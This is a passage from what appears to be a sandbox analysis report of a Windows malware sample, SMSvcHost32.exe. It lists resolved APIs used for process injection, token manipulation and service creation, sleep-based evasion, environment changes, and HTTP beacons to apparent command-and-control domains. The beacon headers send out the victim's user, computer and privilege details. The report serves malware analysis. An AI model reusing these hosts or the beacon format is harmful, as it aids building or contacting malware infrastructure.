| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = 680, address_out = 0x753cdb90 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
2 | |
| Get Address | c:\windows\syswow64\rpcrt4.dll | function = UuidCreateSequential, address_out = 0x7507db30 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x779d7000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x765b9f10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualQuery, address_out = 0x765b7a90 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcess, address_out = 0x779d6f00 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcessToken, address_out = 0x779d7e10 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwQueryInformationToken, address_out = 0x779d6eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessTimes, address_out = 0x765c3dc0 |
|
709 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
709 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindAtomA, address_out = 0x765bef10 |
|
709 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SystemFunction036, address_out = 0x74682a60 |
|
1 |
System (237)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = X2VS1CUM |
|
7 | |
| Sleep | duration = 50000 milliseconds (50.000 seconds) |
|
1 | |
| Sleep | duration = 600000 milliseconds (600.000 seconds) |
|
1 | |
| Sleep | duration = 5000 milliseconds (5.000 seconds) |
|
5 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
79 | |
| Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
2 | |
| Sleep | duration = 30 milliseconds (0.030 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-12-13 14:01:57 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:07 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-12-13 14:02:17 (UTC) |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
58 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
61 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
6 | |
| Get Info | type = Operating System |
|
8 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = ServiceEntryPointThread |
|
1 | |
| Open | mutex_name = ServiceEntryPointThread, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Environment (16)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = a杤畷獧汧晱摩湫p |
|
1 | |
| Get Environment String | name = crackmeololo |
|
10 | |
| Set Environment String | name = USERNAME, value = Nd9E1FYi |
|
1 | |
| Set Environment String | name = standalonemtm, value = true |
|
1 | |
| Set Environment String | name = vendor_id, value = exe_scheduler_3007 |
|
1 | |
| Set Environment String | name = mainprocessoverride, value = svchost.exe |
|
1 | |
| Set Environment String | name = RandomListenPortBase, value = 6000 |
|
1 |
Debug (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = MP3 file corrupted |
|
1 | ||
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = OGG 0 |
|
1 |
Network Behavior
HTTP Sessions (8)
| Information | Value |
|---|---|
| Total Data Sent | 2.10 KB |
| Total Data Received | 8 bytes |
| Contacted Host Count | 4 |
| Contacted Hosts | xmpp.dolcesognar.it, spop.lestanzedifederica.com, arb.palaser.eu, gttopr.space |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | xmpp.dolcesognar.it |
| Server Port | 443 |
| Data Sent | 271 |
| Data Received | 4 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Open Connection | protocol = HTTP, server_name = xmpp.dolcesognar.it, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = xmpp.dolcesognar.it/rpersist4/1197631235 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Close Session | - |
|
4 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | xmpp.dolcesognar.it |
| Server Port | 443 |
| Data Sent | 271 |
| Data Received | 4 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = xmpp.dolcesognar.it, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = xmpp.dolcesognar.it/rpersist4/1197631235 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Close Session | - |
|
4 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | spop.lestanzedifederica.com |
| Server Port | 443 |
| Data Sent | 287 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Open Connection | protocol = HTTP, server_name = spop.lestanzedifederica.com, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
